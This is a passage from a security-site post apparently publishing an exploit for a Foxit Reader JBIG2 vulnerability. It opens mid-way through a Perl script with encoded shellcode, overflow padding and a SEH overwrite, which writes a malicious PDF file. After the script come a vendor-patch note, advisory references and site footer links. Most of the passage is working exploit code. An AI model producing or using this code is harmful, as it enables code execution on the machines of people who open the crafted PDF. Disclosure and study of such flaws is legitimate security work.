"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x58\x42\x48\x42\x4b".
"\x42\x30\x42\x30\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x35\x41\x43".
"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x37".
"\x42\x55\x4a\x36\x50\x37\x4a\x4d\x44\x4e\x43\x47\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x36".
"\x4e\x56\x43\x36\x42\x50\x5a";

my $overflow1 = "\x41" x 1346;
my $overflow2 = "\x41" x (4096 - (length($shellcode) + 255));
my $overflow3 = "\x41" x 255;
my $sehjmp = "SkD"; # ;)
my $sehret = "\x64\xee\x1f\x02";     # 0x021fee64 - damn you SafeSEH

open (my $pdf, "> s.pdf");
binmode $pdf;
print $pdf $pdf_data1.
           $overflow1.$sehjmp.$sehret.$overflow2.$shellcode.$overflow3.
           $pdf_data2;
close $pdf;




-\\Solution
The vendor has released updates. Please see the references for more information.



-\\References(s)
--Foxit Reader Homepage
http://www.foxitsoftware.com/pdf/reader  (Foxit )
--Foxit Reader JBIG2 Symbol Dictionary Processing Vulnerability
http://secunia.com/secunia_research/2009-11  (Secunia)
--Foxit Reader Multiple Vulnerabilities (CORE-2009-0218)
http://www.securityfocus.com/archive/1/50162  (Core Security Technologies Advisories < This e-mail address is being protected from spambots. You need JavaScript enabled to view it >)
--Secunia Research: Foxit Reader JBIG2 Symbol Dictionary Processing Vulnerability
http://www.securityfocus.com/archive/1/50159  (Secunia Research < This e-mail address is being protected from spambots. You need JavaScript enabled to view it >)
--Bloodhound.PDF.9
http://www.symantec.com/security_response/writeup.jsp?docid=2009-032414-2531-9  (Symantec)
--Building the Most Secure PDF Reader
http://www.foxitsoftware.com/pdf/reader/security.ht  (Foxit)
--CORE-2009-0218 Foxit Reader Multiple Vulnerabilities
http://www.coresecurity.com/content/foxit-reader-vulnerabilitie  (Core Security)
 

Security Services by HSC

Contact us

Become partner
Advertise with us
Join our staff